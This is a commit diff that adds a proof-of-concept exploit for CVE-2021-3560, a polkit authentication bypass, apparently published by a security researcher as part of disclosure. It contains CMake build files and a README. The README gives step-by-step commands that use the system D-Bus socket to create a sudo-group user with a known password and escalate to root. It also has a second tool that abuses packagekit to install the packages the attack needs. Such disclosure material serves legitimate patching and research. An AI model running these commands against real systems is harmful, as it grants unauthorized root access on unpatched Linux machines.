PoC for authentication bypass in polkit (CVE-2021-3560)

Author: kevinbackhouse

.gitmodules

@@ -0,0 +1,3 @@
+[submodule "SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse"]
+	path = SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
+	url = https://github.com/kevinbackhouse/DBusParse.git

SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/.gitignore

@@ -0,0 +1 @@
+build

SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/CMakeLists.txt

@@ -0,0 +1,36 @@
+cmake_minimum_required(VERSION 3.10)
+
+enable_testing()
+
+# set the project name
+project(GHSL-2021-074-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-074: authentication bypass in polkit")
+
+# specify the C++ standard
+set(CMAKE_CXX_STANDARD 17)
+set(CMAKE_CXX_STANDARD_REQUIRED True)
+
+option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
+
+add_compile_options(-Wall -Wextra -pedantic -Werror)
+
+if (USE_SANITIZERS)
+  set(SANITIZER_FLAGS "-fsanitize=address,undefined")
+  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+endif()
+
+add_subdirectory(DBusParse)
+
+add_executable(createuser createuser.cpp)
+target_link_libraries(createuser PUBLIC DBusParse DBusParseUtils crypt)
+target_include_directories(
+        createuser PRIVATE
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>)
+
+add_executable(installpackage installpackage.cpp)
+target_link_libraries(installpackage PUBLIC DBusParse DBusParseUtils crypt)
+target_include_directories(
+        installpackage PRIVATE
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>)

SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse

@@ -0,0 +1,70 @@
+# CVE-2021-3560
+
+This directory contains a proof of concept exploit for CVE-2021-3560:
+an authentication bypass vulnerability in
+[polkit](https://gitlab.freedesktop.org/polkit/polkit).
+
+The vulnerability is described in [this blog
+post](https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/).
+
+# Build
+
+Instructions for building the PoC:
+
+```bash
+git submodule update --init  # Download https://github.com/kevinbackhouse/DBusParse
+mkdir build
+cd build
+cmake ..
+make
+```
+
+# Running
+
+The PoC exploits an authentication bypass vulnerability in polkit
+to create a new user account with `sudo` privileges.
+
+Note: if the PoC is run in a graphical session such as GNOME, then it
+will cause the dialog box for the authentication agent to pop up
+repeatedly, which is very annoying and also prevents the PoC from
+working. That is why the first step in the instructions below is
+`ssh localhost`.
+
+```bash
+ssh localhost
+cd build
+./createuser /var/run/dbus/system_bus_socket boris iaminvincible!
+```
+
+Assuming that the PoC is successful, there should now be a user named
+`boris`:
+
+```bash
+$ id boris
+uid=1008(boris) gid=1008(boris) groups=1008(boris),27(sudo)
+```
+
+You can now login as boris, using password "iaminvincible!":
+
+```bash
+su - boris  # password: iaminvincible!
+```
+
+And since `boris` is a member of the `sudo` group, you can now escalate
+privileges to `root`.
+
+## Non-graphical systems
+
+The `createuser` PoC depends on two packages being installed:
+`accountsservice` and `gnome-control-center`. Those packages might not
+be installed on some systems, such as a non-graphical RHEL server.
+However, the polkit vulnerability can also be used to exploit
+[packagekit](https://packagekit.freedesktop.org/), which means that we
+can use the vulnerability to install `accountsservice` and
+`gnome-control-center`.
+
+You can run the `packagekit` PoC like this:
+
+```bash
+./installpackage /var/run/dbus/system_bus_socket gnome-control-center
+```